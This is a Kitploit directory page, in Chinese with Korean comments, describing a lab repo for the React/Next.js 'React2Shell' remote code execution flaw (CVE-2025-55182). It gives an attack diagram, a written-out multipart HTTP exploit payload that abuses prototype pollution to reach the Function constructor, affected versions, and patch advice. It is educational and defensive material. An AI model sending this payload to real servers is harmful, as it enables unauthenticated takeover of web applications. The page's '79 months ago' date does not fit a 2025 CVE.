Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
react-rce — 已与AI一起编写并测试了针对CVE-2025-55182漏洞的样本。 | Kitploit
工具/GitHubGitHub/randarts/react-rce
漏洞利用框架漏洞分析Web应用程序漏洞利用学习与教育Payload 开发实验室与实践
GitHubrandarts/react-rce

react-rce

已与AI一起编写并测试了针对CVE-2025-55182漏洞的样本。

查看仓库
79个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-55182 React2Shell 漏洞实践

使用的 AI : Claude Opus 4.5 ⚠️ 警告:此环境仅用于教育和研究目的。

漏洞概述

项目内容
CVECVE-2025-55182 (React) / CVE-2025-66478 (Next.js)
名称React2Shell
CVSS10.0 (Critical)
类型Pre-Auth Remote Code Execution
原因Flight 协议反序列化时的原型污染

攻击原理

                    ┌─────────────────────────┐
                    │     Attacker            │
                    └───────────┬─────────────┘
                                │
                    POST Request + Next-Action Header
                    multipart/form-data payload
                                │
                                ▼
┌───────────────────────────────────────────────────────────┐
│                     Next.js Server                        │
├───────────────────────────────────────────────────────────┤
│  1. Next-Action 헤더 → Server Action 트리거                  │
│  2. multipart 페이로드 → Flight 프로토콜 역직렬화                │
│  3. Fake Chunk 객체의 then() 메서드 호출                       │
│  4. __proto__ 참조 → 프로토타입 오염                           │
│  5. Function 생성자 주입 → RCE                               │
└───────────────────────────────────────────────────────────┘

漏洞利用载荷结构

POST / HTTP/1.1
Next-Action: x
Content-Type: multipart/form-data; boundary=----Boundary

------Boundary
Content-Disposition: form-data; name="0"

{"_response":{"_formData":{"get":"Function"}},"then":"$1:__proto__:then"}
------Boundary
Content-Disposition: form-data; name="1"

$@0
------Boundary--

关键要素:

  • 通过 Next-Action 标头触发 Server Action
  • Field 0: 带有 then 方法的 Fake Chunk,用于模拟 promise 行为
  • Field 1: 通过 $@0 引用遍历原型链
  • 通过 __proto__:then 访问 Function 构造函数

快速开始

cd vulnerable-app

# 의존성 설치
npm install

# 개발 서버 시작
npm run dev

访问 http://localhost:3000


目录结构

react-rce/
├── README.md
├── vulnerable-app/          # 취약한 Next.js 앱
│   ├── package.json         # Next.js 15.0.3 (취약 버전)
│   └── app/
│       ├── page.js          # UI (CVE 정보 + RCE 시연)
│       ├── actions.js       # Server Actions
│       └── globals.css
└── exploit/                 # 공격 도구 (선택)
    └── exploit.py           # CVE-2025-55182 PoC

受影响版本

  • React: 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • Next.js: 15.x, 16.x (使用 App Router 时)
  • 软件包: react-server-dom-webpack, react-server-dom-turbopack

防御方法

# 패치 버전으로 업그레이드
npm install [email protected] [email protected] [email protected]

参考

  • Next.js 安全公告
  • GitHub: assetnote/react2shell-scanner
  • GitHub: freeqaz/react2shell
下载工具